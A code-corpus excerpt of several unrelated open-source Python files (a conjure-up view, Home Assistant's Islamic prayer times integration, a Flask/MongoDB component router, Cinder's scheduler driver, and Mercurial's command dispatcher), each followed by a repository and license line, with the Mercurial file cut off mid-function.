        """ Builds a list of bundles available to install
        """
        rows = []
        for bundle in app.bundles:
            bundle_metadata = bundle['Meta']['bundle-metadata']
            try:
                # Prefer the conjure-up friendly name when the bundle ships
                # the extra-info blob; fall back to the charm-store id.
                conjure_data = bundle['Meta']['extra-info/conjure-up']
                name = conjure_data.get('friendly-name',
                                        bundle['Meta']['id']['Name'])
            except KeyError:
                name = bundle['Meta']['id']['Name']
            self.fname_id_map[name] = bundle
            label_btn = Color.body(
                menu_btn(label=name, on_press=self.done),
                focus_map="menu_button focus")
            description = Text(
                bundle_metadata.get('Description', 'Needs a description'),
                align="left")
            rows.append(Columns(
                [
                    ("weight", 0.2, label_btn),
                    ("weight", 0.3, description)
                ],
                dividechars=1))
            rows.append(Padding.line_break(""))
        return Pile(rows)

    def cancel(self, button):
        EventLoop.exit(0)

    def done(self, result):
        # Look the bundle back up by its button label and hand it to the callback.
        self.cb(self.fname_id_map[result.label])
| conjure-up/conjure-up | conjureup/ui/views/variant.py | Python | mit | 2,592 |
"""The islamic_prayer_times component."""
from datetime import timedelta
import logging
from prayer_times_calculator import PrayerTimesCalculator, exceptions
from requests.exceptions import ConnectionError as ConnError
import voluptuous as vol
from homeassistant.config_entries import SOURCE_IMPORT
from homeassistant.exceptions import ConfigEntryNotReady
from homeassistant.helpers.dispatcher import async_dispatcher_send
from homeassistant.helpers.event import async_call_later, async_track_point_in_time
import homeassistant.util.dt as dt_util
from .const import (
CALC_METHODS,
CONF_CALC_METHOD,
DATA_UPDATED,
DEFAULT_CALC_METHOD,
DOMAIN,
)
_LOGGER = logging.getLogger(__name__)
# YAML configuration schema: a single optional calculation-method choice under
# the integration domain.  async_setup() below forwards this data into a
# config entry through an import flow.
CONFIG_SCHEMA = vol.Schema(
    {
        DOMAIN: {
            vol.Optional(CONF_CALC_METHOD, default=DEFAULT_CALC_METHOD): vol.In(
                CALC_METHODS
            ),
        }
    },
    extra=vol.ALLOW_EXTRA,
)
async def async_setup(hass, config):
    """Import the Islamic Prayer component from config."""
    # If YAML configuration exists, hand it off to a config-entry import flow;
    # the component itself is then set up via async_setup_entry.
    if DOMAIN in config:
        hass.async_create_task(
            hass.config_entries.flow.async_init(
                DOMAIN, context={"source": SOURCE_IMPORT}, data=config[DOMAIN]
            )
        )

    return True
async def async_setup_entry(hass, config_entry):
    """Set up the Islamic Prayer Component."""
    client = IslamicPrayerClient(hass, config_entry)

    # Abort (returning False) if the client could not complete its setup.
    if not await client.async_setup():
        return False

    # Single client instance stored directly under the domain key.
    hass.data.setdefault(DOMAIN, client)
    return True
async def async_unload_entry(hass, config_entry):
    """Unload Islamic Prayer entry from config_entry."""
    # Cancel the scheduled midnight update before dropping the client.
    if hass.data[DOMAIN].event_unsub:
        hass.data[DOMAIN].event_unsub()
    hass.data.pop(DOMAIN)
    await hass.config_entries.async_forward_entry_unload(config_entry, "sensor")
    return True
class IslamicPrayerClient:
    """Islamic Prayer Client Object."""

    def __init__(self, hass, config_entry):
        """Initialize the Islamic Prayer client."""
        self.hass = hass
        self.config_entry = config_entry
        self.prayer_times_info = {}   # prayer name -> datetime for today
        self.available = True         # False while the upstream API is failing
        self.event_unsub = None       # cancel handle for the scheduled update

    @property
    def calc_method(self):
        """Return the calculation method."""
        return self.config_entry.options[CONF_CALC_METHOD]

    def get_new_prayer_times(self):
        """Fetch prayer times for today."""
        # Blocking network call; always invoked via async_add_executor_job.
        calc = PrayerTimesCalculator(
            latitude=self.hass.config.latitude,
            longitude=self.hass.config.longitude,
            calculation_method=self.calc_method,
            date=str(dt_util.now().date()),
        )
        return calc.fetch_prayer_times()

    async def async_schedule_future_update(self):
        """Schedule future update for sensors.

        Midnight is a calculated time.  The specifics of the calculation
        depends on the method of the prayer time calculation.  This calculated
        midnight is the time at which the time to pray the Isha prayers have
        expired.

        Calculated Midnight: The Islamic midnight.
        Traditional Midnight: 12:00AM

        Update logic for prayer times:

        If the Calculated Midnight is before the traditional midnight then wait
        until the traditional midnight to run the update.  This way the day
        will have changed over and we don't need to do any fancy calculations.

        If the Calculated Midnight is after the traditional midnight, then wait
        until after the calculated Midnight.  We don't want to update the prayer
        times too early or else the timings might be incorrect.

        Example:
        calculated midnight = 11:23PM (before traditional midnight)
        Update time: 12:00AM

        calculated midnight = 1:35AM  (after traditional midnight)
        update time: 1:36AM.
        """
        _LOGGER.debug("Scheduling next update for Islamic prayer times")

        now = dt_util.utcnow()

        midnight_dt = self.prayer_times_info["Midnight"]

        if now > dt_util.as_utc(midnight_dt):
            # Midnight already passed: update one minute after tomorrow's.
            next_update_at = midnight_dt + timedelta(days=1, minutes=1)
            _LOGGER.debug(
                "Midnight is after day the changes so schedule update for after Midnight the next day"
            )
        else:
            _LOGGER.debug(
                "Midnight is before the day changes so schedule update for the next start of day"
            )
            next_update_at = dt_util.start_of_local_day(now + timedelta(days=1))

        _LOGGER.info("Next update scheduled for: %s", next_update_at)

        self.event_unsub = async_track_point_in_time(
            self.hass, self.async_update, next_update_at
        )

    async def async_update(self, *_):
        """Update sensors with new prayer times."""
        try:
            prayer_times = await self.hass.async_add_executor_job(
                self.get_new_prayer_times
            )
            self.available = True
        except (exceptions.InvalidResponseError, ConnError):
            # Mark unavailable and retry in a minute instead of giving up.
            self.available = False
            _LOGGER.debug("Error retrieving prayer times.")
            async_call_later(self.hass, 60, self.async_update)
            return

        # API returns wall-clock strings; combine with today's date.
        for prayer, time in prayer_times.items():
            self.prayer_times_info[prayer] = dt_util.parse_datetime(
                f"{dt_util.now().date()} {time}"
            )
        await self.async_schedule_future_update()

        _LOGGER.debug("New prayer times retrieved. Updating sensors.")
        async_dispatcher_send(self.hass, DATA_UPDATED)

    async def async_setup(self):
        """Set up the Islamic prayer client."""
        await self.async_add_options()

        # Verify connectivity once synchronously; abort setup (and let HA
        # retry later) when the upstream service is unreachable.
        try:
            await self.hass.async_add_executor_job(self.get_new_prayer_times)
        except (exceptions.InvalidResponseError, ConnError):
            raise ConfigEntryNotReady

        await self.async_update()
        self.config_entry.add_update_listener(self.async_options_updated)

        self.hass.async_create_task(
            self.hass.config_entries.async_forward_entry_setup(
                self.config_entry, "sensor"
            )
        )

        return True

    async def async_add_options(self):
        """Add options for entry."""
        # Migrate the calc method from entry data to entry options once.
        if not self.config_entry.options:
            data = dict(self.config_entry.data)
            calc_method = data.pop(CONF_CALC_METHOD, DEFAULT_CALC_METHOD)

            self.hass.config_entries.async_update_entry(
                self.config_entry, data=data, options={CONF_CALC_METHOD: calc_method}
            )

    @staticmethod
    async def async_options_updated(hass, entry):
        """Triggered by config entry options updates."""
        # Drop the pending scheduled update and refresh with the new options.
        if hass.data[DOMAIN].event_unsub:
            hass.data[DOMAIN].event_unsub()
        await hass.data[DOMAIN].async_update()
| nkgilley/home-assistant | homeassistant/components/islamic_prayer_times/__init__.py | Python | apache-2.0 | 6,817 |
from flask import render_template, request, url_for, jsonify
from application.mongo_db import mongo
from bson.objectid import ObjectId
from . import module
from . import validation
from .setup import setup
@module.route("/<component_type>/", methods=("GET", "POST"))
def index(component_type):
    """Render the page for a known component type; 404 for unknown types."""
    if not validation.validate_type(component_type):
        return "", 404
    context = {"dependencies": setup(component_type)}
    return render_template("components/%s.html" % component_type, **context)
@module.route("/<component_type>/filter", methods=("POST",))
def filter_components(component_type):
    """Return (as JSON) all components belonging to the posted group_id."""
    if validation.validate_type(component_type):
        result = list(
            mongo.db.components.find({
                "group_id": ObjectId(request.form.get("group_id"))
            })
        )
        return jsonify(result)
    else:
        return jsonify({}), 404
@module.route("/<component_type>/add", methods=("POST",))
def add(component_type):
    """Insert a new component from the posted form; return its new id.

    When the form carries an image field, the response also includes the
    image's download URL.
    """
    if validation.validate_type(component_type):
        data = {"type": component_type}
        # Copy every form field except the control fields "ajax" and "id".
        for item in request.form:
            if item != "ajax" and item != 'id':
                data[item] = request.form[item]
        cid = mongo.db.components.insert_one(data).inserted_id
        if "image" in data:
            return jsonify(
                {"id": str(cid), "image": url_for("file_upload.get", name=data["image"])},
            )
        else:
            return jsonify(
                {"id": str(cid)}
            )
    else:
        return jsonify({}), 404
@module.route("/<component_type>/remove", methods=("POST",))
def remove(component_type):
    """Delete the component with the posted id; 404 for unknown types."""
    if not validation.validate_type(component_type):
        return jsonify({}), 404
    mongo.db.components.remove({"_id": ObjectId(request.form.get("id"))})
    return jsonify({})
@module.route("/<component_type>/update", methods=("POST",))
def update(component_type):
    """Update the component with the posted id from the remaining form fields."""
    if validation.validate_type(component_type):
        data = {"type": component_type}
        # Copy non-empty form fields, skipping the control fields "ajax"/"id".
        for item in request.form:
            if item == "ajax":
                continue
            if item != 'id' and request.form.get(item) != '':
                data[item] = request.form.get(item)
        oid = request.form.get("id")
        mongo.db.components.update(
            {
                "_id": ObjectId(oid)
            },
            {
                "$set": data
            }
        )
        if "image" in data:
            # Echo the new image URL back so the client can refresh it.
            src = u""+url_for("file_upload.get", name=data["image"])
            return jsonify({"image": src})
        return jsonify({})
    else:
        return jsonify({}), 404
| megrela/flask-cms-control-panel | application/modules/components/router.py | Python | mit | 2,677 |
# Copyright (c) 2010 OpenStack Foundation
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Scheduler base class that all Schedulers should inherit from
"""
from oslo_config import cfg
from oslo_utils import importutils
from oslo_utils import timeutils
from cinder import db
from cinder.i18n import _
from cinder.volume import rpcapi as volume_rpcapi
# oslo.config options shared by all scheduler drivers; registered globally on
# import so CONF carries them before any driver is instantiated.
scheduler_driver_opts = [
    cfg.StrOpt('scheduler_host_manager',
               default='cinder.scheduler.host_manager.HostManager',
               help='The scheduler host manager class to use'),
    cfg.IntOpt('scheduler_max_attempts',
               default=3,
               # Fix: user-facing help text read "an volume".
               help='Maximum number of attempts to schedule a volume'),
]

CONF = cfg.CONF
CONF.register_opts(scheduler_driver_opts)
def volume_update_db(context, volume_id, host):
    """Set the host and set the scheduled_at field of a volume.

    :returns: A Volume with the updated fields set properly.
    """
    return db.volume_update(context, volume_id,
                            {'host': host, 'scheduled_at': timeutils.utcnow()})
def group_update_db(context, group, host):
    """Set the host and the scheduled_at field of a consistencygroup.

    :returns: A Consistencygroup with the updated fields set properly.
    """
    # Mutates and persists the passed-in group object in place.
    group.update({'host': host, 'updated_at': timeutils.utcnow()})
    group.save()
    return group
class Scheduler(object):
    """The base class that all Scheduler classes should inherit from."""

    def __init__(self):
        # Host manager class is configurable (scheduler_host_manager option).
        self.host_manager = importutils.import_object(
            CONF.scheduler_host_manager)
        self.volume_rpcapi = volume_rpcapi.VolumeAPI()

    def is_ready(self):
        """Returns True if Scheduler is ready to accept requests.

        This is to handle scheduler service startup when it has no volume hosts
        stats and will fail all the requests.
        """
        return self.host_manager.has_all_capabilities()

    def update_service_capabilities(self, service_name, host, capabilities):
        """Process a capability update from a service node."""
        self.host_manager.update_service_capabilities(service_name,
                                                      host,
                                                      capabilities)

    def host_passes_filters(self, context, volume_id, host, filter_properties):
        """Check if the specified host passes the filters."""
        raise NotImplementedError(_("Must implement host_passes_filters"))

    def find_retype_host(self, context, request_spec, filter_properties=None,
                         migration_policy='never'):
        """Find a host that can accept the volume with its new type."""
        raise NotImplementedError(_("Must implement find_retype_host"))

    def schedule(self, context, topic, method, *_args, **_kwargs):
        """Must override schedule method for scheduler to work."""
        raise NotImplementedError(_("Must implement a fallback schedule"))

    def schedule_create_volume(self, context, request_spec, filter_properties):
        """Must override schedule method for scheduler to work."""
        raise NotImplementedError(_("Must implement schedule_create_volume"))

    def schedule_create_consistencygroup(self, context, group,
                                         request_spec_list,
                                         filter_properties_list):
        """Must override schedule method for scheduler to work."""
        raise NotImplementedError(_(
            "Must implement schedule_create_consistencygroup"))

    def get_pools(self, context, filters):
        """Must override schedule method for scheduler to work."""
        raise NotImplementedError(_(
            "Must implement schedule_get_pools"))
| nikesh-mahalka/cinder | cinder/scheduler/driver.py | Python | apache-2.0 | 4,426 |
# dispatch.py - command dispatching for mercurial
#
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from i18n import _
import os, sys, atexit, signal, pdb, socket, errno, shlex, time, traceback, re
import util, commands, hg, fancyopts, extensions, hook, error
import cmdutil, encoding
import ui as uimod
class request(object):
    """Everything needed to run a single hg command invocation."""

    def __init__(self, args, ui=None, repo=None, fin=None, fout=None,
                 ferr=None):
        # command-line arguments (typically sys.argv[1:])
        self.args = args
        self.ui = ui
        self.repo = repo
        # optional replacement input/output/error streams
        self.fin, self.fout, self.ferr = fin, fout, ferr
def run():
    """Process entry point: execute the command in sys.argv and exit."""
    status = dispatch(request(sys.argv[1:]))
    sys.exit((status or 0) & 255)
def dispatch(req):
    "run the command specified in req.args"
    # pick an error stream before the ui is guaranteed to exist, so that
    # failures during ui setup can still be reported somewhere
    if req.ferr:
        ferr = req.ferr
    elif req.ui:
        ferr = req.ui.ferr
    else:
        ferr = sys.stderr

    try:
        if not req.ui:
            req.ui = uimod.ui()
        if '--traceback' in req.args:
            req.ui.setconfig('ui', 'traceback', 'on')

        # set ui streams from the request
        if req.fin:
            req.ui.fin = req.fin
        if req.fout:
            req.ui.fout = req.fout
        if req.ferr:
            req.ui.ferr = req.ferr
    except util.Abort, inst:
        ferr.write(_("abort: %s\n") % inst)
        if inst.hint:
            ferr.write(_("(%s)\n") % inst.hint)
        return -1
    except error.ParseError, inst:
        if len(inst.args) > 1:
            ferr.write(_("hg: parse error at %s: %s\n") %
                       (inst.args[1], inst.args[0]))
        else:
            ferr.write(_("hg: parse error: %s\n") % inst.args[0])
        return -1

    # quote args containing whitespace for the command log
    msg = ' '.join(' ' in a and repr(a) or a for a in req.args)
    starttime = time.time()
    ret = None
    try:
        ret = _runcatch(req)
        return ret
    finally:
        duration = time.time() - starttime
        # logged even when _runcatch raised; ret stays None in that case
        req.ui.log("commandfinish", "%s exited %s after %0.2f seconds\n",
                   msg, ret or 0, duration)
def _runcatch(req):
    """Run the request, translating known exceptions into user messages.

    Returns the command's exit code, or -1 after printing an error for a
    recognized failure.  Unrecognized exceptions are reported together
    with version and extension information, then re-raised.
    """
    def catchterm(*args):
        raise error.SignalInterrupt

    ui = req.ui
    # translate termination signals into SignalInterrupt so cleanup runs
    try:
        for name in 'SIGBREAK', 'SIGHUP', 'SIGTERM':
            num = getattr(signal, name, None)
            if num:
                signal.signal(num, catchterm)
    except ValueError:
        pass # happens if called in a thread

    try:
        try:
            debugger = 'pdb'
            debugtrace = {
                'pdb' : pdb.set_trace
            }
            debugmortem = {
                'pdb' : pdb.post_mortem
            }

            # read --config before doing anything else
            # (e.g. to change trust settings for reading .hg/hgrc)
            cfgs = _parseconfig(req.ui, _earlygetopt(['--config'], req.args))

            if req.repo:
                # copy configs that were passed on the cmdline (--config) to
                # the repo ui
                for cfg in cfgs:
                    req.repo.ui.setconfig(*cfg)

            debugger = ui.config("ui", "debugger")
            if not debugger:
                debugger = 'pdb'

            # a custom debugger module must provide set_trace/post_mortem
            try:
                debugmod = __import__(debugger)
            except ImportError:
                debugmod = pdb

            debugtrace[debugger] = debugmod.set_trace
            debugmortem[debugger] = debugmod.post_mortem

            # enter the debugger before command execution
            if '--debugger' in req.args:
                ui.warn(_("entering debugger - "
                          "type c to continue starting hg or h for help\n"))

                if (debugger != 'pdb' and
                    debugtrace[debugger] == debugtrace['pdb']):
                    ui.warn(_("%s debugger specified "
                              "but its module was not found\n") % debugger)

                debugtrace[debugger]()
            try:
                return _dispatch(req)
            finally:
                ui.flush()
        except: # re-raises
            # enter the debugger when we hit an exception
            if '--debugger' in req.args:
                traceback.print_exc()
                debugmortem[debugger](sys.exc_info()[2])
            ui.traceback()
            raise

    # Global exception handling, alphabetically
    # Mercurial-specific first, followed by built-in and library exceptions
    except error.AmbiguousCommand, inst:
        ui.warn(_("hg: command '%s' is ambiguous:\n %s\n") %
                (inst.args[0], " ".join(inst.args[1])))
    except error.ParseError, inst:
        if len(inst.args) > 1:
            ui.warn(_("hg: parse error at %s: %s\n") %
                    (inst.args[1], inst.args[0]))
        else:
            ui.warn(_("hg: parse error: %s\n") % inst.args[0])
        return -1
    except error.LockHeld, inst:
        if inst.errno == errno.ETIMEDOUT:
            reason = _('timed out waiting for lock held by %s') % inst.locker
        else:
            reason = _('lock held by %s') % inst.locker
        ui.warn(_("abort: %s: %s\n") % (inst.desc or inst.filename, reason))
    except error.LockUnavailable, inst:
        ui.warn(_("abort: could not lock %s: %s\n") %
                (inst.desc or inst.filename, inst.strerror))
    except error.CommandError, inst:
        if inst.args[0]:
            ui.warn(_("hg %s: %s\n") % (inst.args[0], inst.args[1]))
            commands.help_(ui, inst.args[0], full=False, command=True)
        else:
            ui.warn(_("hg: %s\n") % inst.args[1])
            commands.help_(ui, 'shortlist')
    except error.OutOfBandError, inst:
        ui.warn(_("abort: remote error:\n"))
        ui.warn(''.join(inst.args))
    except error.RepoError, inst:
        ui.warn(_("abort: %s!\n") % inst)
        if inst.hint:
            ui.warn(_("(%s)\n") % inst.hint)
    except error.ResponseError, inst:
        ui.warn(_("abort: %s") % inst.args[0])
        if not isinstance(inst.args[1], basestring):
            ui.warn(" %r\n" % (inst.args[1],))
        elif not inst.args[1]:
            ui.warn(_(" empty string\n"))
        else:
            ui.warn("\n%r\n" % util.ellipsis(inst.args[1]))
    except error.RevlogError, inst:
        ui.warn(_("abort: %s!\n") % inst)
    except error.SignalInterrupt:
        ui.warn(_("killed!\n"))
    except error.UnknownCommand, inst:
        ui.warn(_("hg: unknown command '%s'\n") % inst.args[0])
        try:
            # check if the command is in a disabled extension
            # (but don't check for extensions themselves)
            commands.help_(ui, inst.args[0], unknowncmd=True)
        except error.UnknownCommand:
            commands.help_(ui, 'shortlist')
    except error.InterventionRequired, inst:
        ui.warn("%s\n" % inst)
        return 1
    except util.Abort, inst:
        ui.warn(_("abort: %s\n") % inst)
        if inst.hint:
            ui.warn(_("(%s)\n") % inst.hint)
    except ImportError, inst:
        ui.warn(_("abort: %s!\n") % inst)
        # last word of the message is the module that failed to import
        m = str(inst).split()[-1]
        if m in "mpatch bdiff".split():
            ui.warn(_("(did you forget to compile extensions?)\n"))
        elif m in "zlib".split():
            ui.warn(_("(is your Python install correct?)\n"))
    except IOError, inst:
        if util.safehasattr(inst, "code"):
            ui.warn(_("abort: %s\n") % inst)
        elif util.safehasattr(inst, "reason"):
            try: # usually it is in the form (errno, strerror)
                reason = inst.reason.args[1]
            except (AttributeError, IndexError):
                # it might be anything, for example a string
                reason = inst.reason
            ui.warn(_("abort: error: %s\n") % reason)
        elif util.safehasattr(inst, "args") and inst.args[0] == errno.EPIPE:
            if ui.debugflag:
                ui.warn(_("broken pipe\n"))
        elif getattr(inst, "strerror", None):
            if getattr(inst, "filename", None):
                ui.warn(_("abort: %s: %s\n") % (inst.strerror, inst.filename))
            else:
                ui.warn(_("abort: %s\n") % inst.strerror)
        else:
            raise
    except OSError, inst:
        if getattr(inst, "filename", None) is not None:
            ui.warn(_("abort: %s: '%s'\n") % (inst.strerror, inst.filename))
        else:
            ui.warn(_("abort: %s\n") % inst.strerror)
    except KeyboardInterrupt:
        try:
            ui.warn(_("interrupted!\n"))
        except IOError, inst:
            if inst.errno == errno.EPIPE:
                if ui.debugflag:
                    ui.warn(_("\nbroken pipe\n"))
            else:
                raise
    except MemoryError:
        ui.warn(_("abort: out of memory\n"))
    except SystemExit, inst:
        # Commands shouldn't sys.exit directly, but give a return code.
        # Just in case catch this and and pass exit code to caller.
        return inst.code
    except socket.error, inst:
        ui.warn(_("abort: %s\n") % inst.args[-1])
    except: # re-raises
        myver = util.version()
        # For compatibility checking, we discard the portion of the hg
        # version after the + on the assumption that if a "normal
        # user" is running a build with a + in it the packager
        # probably built from fairly close to a tag and anyone with a
        # 'make local' copy of hg (where the version number can be out
        # of date) will be clueful enough to notice the implausible
        # version number and try updating.
        compare = myver.split('+')[0]
        ct = tuplever(compare)
        worst = None, ct, ''
        for name, mod in extensions.extensions():
            testedwith = getattr(mod, 'testedwith', '')
            report = getattr(mod, 'buglink', _('the extension author.'))
            if not testedwith.strip():
                # We found an untested extension. It's likely the culprit.
                worst = name, 'unknown', report
                break
            if compare not in testedwith.split() and testedwith != 'internal':
                tested = [tuplever(v) for v in testedwith.split()]
                lower = [t for t in tested if t < ct]
                nearest = max(lower or tested)
                if worst[0] is None or nearest < worst[1]:
                    worst = name, nearest, report
        if worst[0] is not None:
            name, testedwith, report = worst
            if not isinstance(testedwith, str):
                testedwith = '.'.join([str(c) for c in testedwith])
            warning = (_('** Unknown exception encountered with '
                         'possibly-broken third-party extension %s\n'
                         '** which supports versions %s of Mercurial.\n'
                         '** Please disable %s and try your action again.\n'
                         '** If that fixes the bug please report it to %s\n')
                       % (name, testedwith, name, report))
        else:
            warning = (_("** unknown exception encountered, "
                         "please report by visiting\n") +
                       _("** http://mercurial.selenic.com/wiki/BugTracker\n"))
        warning += ((_("** Python %s\n") % sys.version.replace('\n', '')) +
                    (_("** Mercurial Distributed SCM (version %s)\n") % myver) +
                    (_("** Extensions loaded: %s\n") %
                     ", ".join([x[0] for x in extensions.extensions()])))
        ui.log("commandexception", "%s\n%s\n", warning, traceback.format_exc())
        ui.warn(warning)
        raise

    return -1
def tuplever(v):
    """Turn a dotted version string into a tuple of ints.

    Returns an empty tuple when any component is not a plain integer.
    """
    try:
        return tuple(int(part) for part in v.split('.'))
    except ValueError:
        return tuple()
def aliasargs(fn, givenargs):
    """Combine an alias function's stored args with the given args.

    Positional placeholders ($1, $2, ...) inside the stored args are
    substituted with the corresponding given argument; each consumed
    given argument is dropped from the remainder that gets appended.
    Aborts when a placeholder refers past the end of givenargs.
    """
    stored = getattr(fn, 'args', [])
    if not stored:
        return stored + givenargs
    cmd = ' '.join(map(util.shellquote, stored))
    consumed = []
    def substitute(m):
        idx = int(m.group(1)) - 1
        consumed.append(idx)
        if idx >= len(givenargs):
            raise util.Abort(_('too few arguments for command alias'))
        return givenargs[idx]
    cmd = re.sub(r'\$(\d+|\$)', substitute, cmd)
    leftover = [a for i, a in enumerate(givenargs) if i not in consumed]
    return shlex.split(cmd) + leftover
class cmdalias(object):
    """Callable wrapper implementing a user-configured [alias] entry.

    The definition is either another hg command line (possibly with
    $1/$2... placeholders) or, when prefixed with '!', a shell command.
    Invalid definitions install a stub fn that prints an error and set
    self.badalias.
    """
    def __init__(self, name, definition, cmdtable):
        self.name = self.cmd = name
        self.cmdname = ''
        self.definition = definition
        self.args = []
        self.opts = []
        self.help = ''
        self.norepo = True
        self.optionalrepo = False
        self.badalias = False

        # does this alias shadow an existing command?
        try:
            aliases, entry = cmdutil.findcmd(self.name, cmdtable)
            for alias, e in cmdtable.iteritems():
                if e is entry:
                    self.cmd = alias
                    break
            self.shadows = True
        except error.UnknownCommand:
            self.shadows = False

        if not self.definition:
            def fn(ui, *args):
                ui.warn(_("no definition for alias '%s'\n") % self.name)
                return 1
            self.fn = fn
            self.badalias = True
            return

        # '!' prefix: run the rest of the definition through the shell
        if self.definition.startswith('!'):
            self.shell = True
            def fn(ui, *args):
                env = {'HG_ARGS': ' '.join((self.name,) + args)}
                def _checkvar(m):
                    if m.groups()[0] == '$':
                        return m.group()
                    elif int(m.groups()[0]) <= len(args):
                        return m.group()
                    else:
                        ui.debug("No argument found for substitution "
                                 "of %i variable in alias '%s' definition."
                                 % (int(m.groups()[0]), self.name))
                        return ''
                cmd = re.sub(r'\$(\d+|\$)', _checkvar, self.definition[1:])
                replace = dict((str(i + 1), arg) for i, arg in enumerate(args))
                replace['0'] = self.name
                replace['@'] = ' '.join(args)
                cmd = util.interpolate(r'\$', replace, cmd, escape_prefix=True)
                return util.system(cmd, environ=env, out=ui.fout)
            self.fn = fn
            return

        args = shlex.split(self.definition)
        self.cmdname = cmd = args.pop(0)
        args = map(util.expandpath, args)

        # early options would be consumed before alias expansion, so they
        # may only appear on the real command line, not in a definition
        for invalidarg in ("--cwd", "-R", "--repository", "--repo", "--config"):
            if _earlygetopt([invalidarg], args):
                def fn(ui, *args):
                    ui.warn(_("error in definition for alias '%s': %s may only "
                              "be given on the command line\n")
                            % (self.name, invalidarg))
                    return 1
                self.fn = fn
                self.badalias = True
                return

        try:
            tableentry = cmdutil.findcmd(cmd, cmdtable, False)[1]
            if len(tableentry) > 2:
                self.fn, self.opts, self.help = tableentry
            else:
                self.fn, self.opts = tableentry

            self.args = aliasargs(self.fn, args)
            if cmd not in commands.norepo.split(' '):
                self.norepo = False
            if cmd in commands.optionalrepo.split(' '):
                self.optionalrepo = True
            if self.help.startswith("hg " + cmd):
                # drop prefix in old-style help lines so hg shows the alias
                self.help = self.help[4 + len(cmd):]
            self.__doc__ = self.fn.__doc__

        except error.UnknownCommand:
            def fn(ui, *args):
                ui.warn(_("alias '%s' resolves to unknown command '%s'\n") \
                        % (self.name, cmd))
                try:
                    # check if the command is in a disabled extension
                    commands.help_(ui, cmd, unknowncmd=True)
                except error.UnknownCommand:
                    pass
                return 1
            self.fn = fn
            self.badalias = True
        except error.AmbiguousCommand:
            def fn(ui, *args):
                ui.warn(_("alias '%s' resolves to ambiguous command '%s'\n") \
                        % (self.name, cmd))
                return 1
            self.fn = fn
            self.badalias = True

    def __call__(self, ui, *args, **opts):
        if self.shadows:
            ui.debug("alias '%s' shadows command '%s'\n" %
                     (self.name, self.cmdname))

        if util.safehasattr(self, 'shell'):
            return self.fn(ui, *args, **opts)
        else:
            try:
                util.checksignature(self.fn)(ui, *args, **opts)
            except error.SignatureError:
                # report what the alias expanded to before re-raising
                args = ' '.join([self.cmdname] + self.args)
                ui.debug("alias '%s' expands to '%s'\n" % (self.name, args))
                raise
def addaliases(ui, cmdtable):
    """Insert user-configured [alias] entries into cmdtable.

    Aliases are processed after extensions have been loaded, so they may
    use extension commands.  Aliases can also use other alias
    definitions, but only ones defined prior to the current definition.
    """
    for name, definition in ui.configitems('alias'):
        entry = cmdalias(name, definition, cmdtable)
        try:
            # skip if an identical alias definition is already in place
            if cmdtable[entry.cmd][0].definition == entry.definition:
                continue
        except (KeyError, AttributeError):
            # no previous entry, or the previous entry is not a cmdalias
            pass
        cmdtable[entry.name] = (entry, entry.opts, entry.help)
        if entry.norepo:
            commands.norepo += ' %s' % name
        if entry.optionalrepo:
            commands.optionalrepo += ' %s' % name
def _parse(ui, args):
    """Split args into (cmd, cmdfunc, args, globalopts, cmdopts).

    Global options may appear anywhere on the command line; command
    options are validated against the command's option table combined
    with the global option table, then separated back out.
    """
    options = {}
    cmdoptions = {}
    try:
        args = fancyopts.fancyopts(args, commands.globalopts, options)
    except fancyopts.getopt.GetoptError, inst:
        raise error.CommandError(None, inst)

    if args:
        cmd, args = args[0], args[1:]
        aliases, entry = cmdutil.findcmd(cmd, commands.table,
                                         ui.configbool("ui", "strict"))
        cmd = aliases[0]
        args = aliasargs(entry[0], args)
        defaults = ui.config("defaults", cmd)
        if defaults:
            args = map(util.expandpath, shlex.split(defaults)) + args
        c = list(entry[1])
    else:
        cmd = None
        c = []

    # combine global options into local
    for o in commands.globalopts:
        c.append((o[0], o[1], options[o[1]], o[3]))

    try:
        args = fancyopts.fancyopts(args, c, cmdoptions, True)
    except fancyopts.getopt.GetoptError, inst:
        raise error.CommandError(cmd, inst)

    # separate global options back out
    for o in commands.globalopts:
        n = o[1]
        options[n] = cmdoptions[n]
        del cmdoptions[n]

    # 'entry' is only bound when a command was given; cmd is None otherwise
    return (cmd, cmd and entry[0] or None, args, options, cmdoptions)
def _parseconfig(ui, config):
"""parse the --config options from the command line"""
configs = []
for cfg in config:
try:
name, value = cfg.split('=', 1)
section, name = name.split('.', 1)
if not section or not name:
raise IndexError
ui.setconfig(section, name, value)
configs.append((section, name, value))
except (IndexError, ValueError):
raise util.Abort(_('malformed --config option: %r '
'(use --config section.name=value)') % cfg)
return configs
def _earlygetopt(aliases, args):
"""Return list of values for an option (or aliases).
The values are listed in the order they appear in args.
The options and values are removed from args.
>>> args = ['x', '--cwd', 'foo', 'y']
>>> _earlygetopt(['--cwd'], args), args
(['foo'], ['x', 'y'])
>>> args = ['x', '--cwd=bar', 'y']
>>> _earlygetopt(['--cwd'], args), args
(['bar'], ['x', 'y'])
>>> args = ['x', '-R', 'foo', 'y']
>>> _earlygetopt(['-R'], args), args
(['foo'], ['x', 'y'])
>>> args = ['x', '-Rbar', 'y']
>>> _earlygetopt(['-R'], args), args
(['bar'], ['x', 'y'])
"""
try:
argcount = args.index("--")
except ValueError:
argcount = len(args)
shortopts = [opt for opt in aliases if len(opt) == 2]
values = []
pos = 0
while pos < argcount:
fullarg = arg = args[pos]
equals = arg.find('=')
if equals > -1:
arg = arg[:equals]
if arg in aliases:
del args[pos]
if equals > -1:
values.append(fullarg[equals + 1:])
argcount -= 1
else:
if pos + 1 >= argcount:
# ignore and let getopt report an error if there is no value
break
values.append(args.pop(pos))
argcount -= 2
elif arg[:2] in shortopts:
# short option can have no following space, e.g. hg log -Rfoo
values.append(args.pop(pos)[2:])
argcount -= 1
else:
pos += 1
return values
def runcommand(lui, repo, cmd, fullargs, ui, options, d, cmdpats, cmdoptions):
    """Run command thunk *d* bracketed by its pre- and post-hooks."""
    argstext = " ".join(fullargs)
    # run pre-hook; aborts the whole command when it fails
    hook.hook(lui, repo, "pre-%s" % cmd, True, args=argstext,
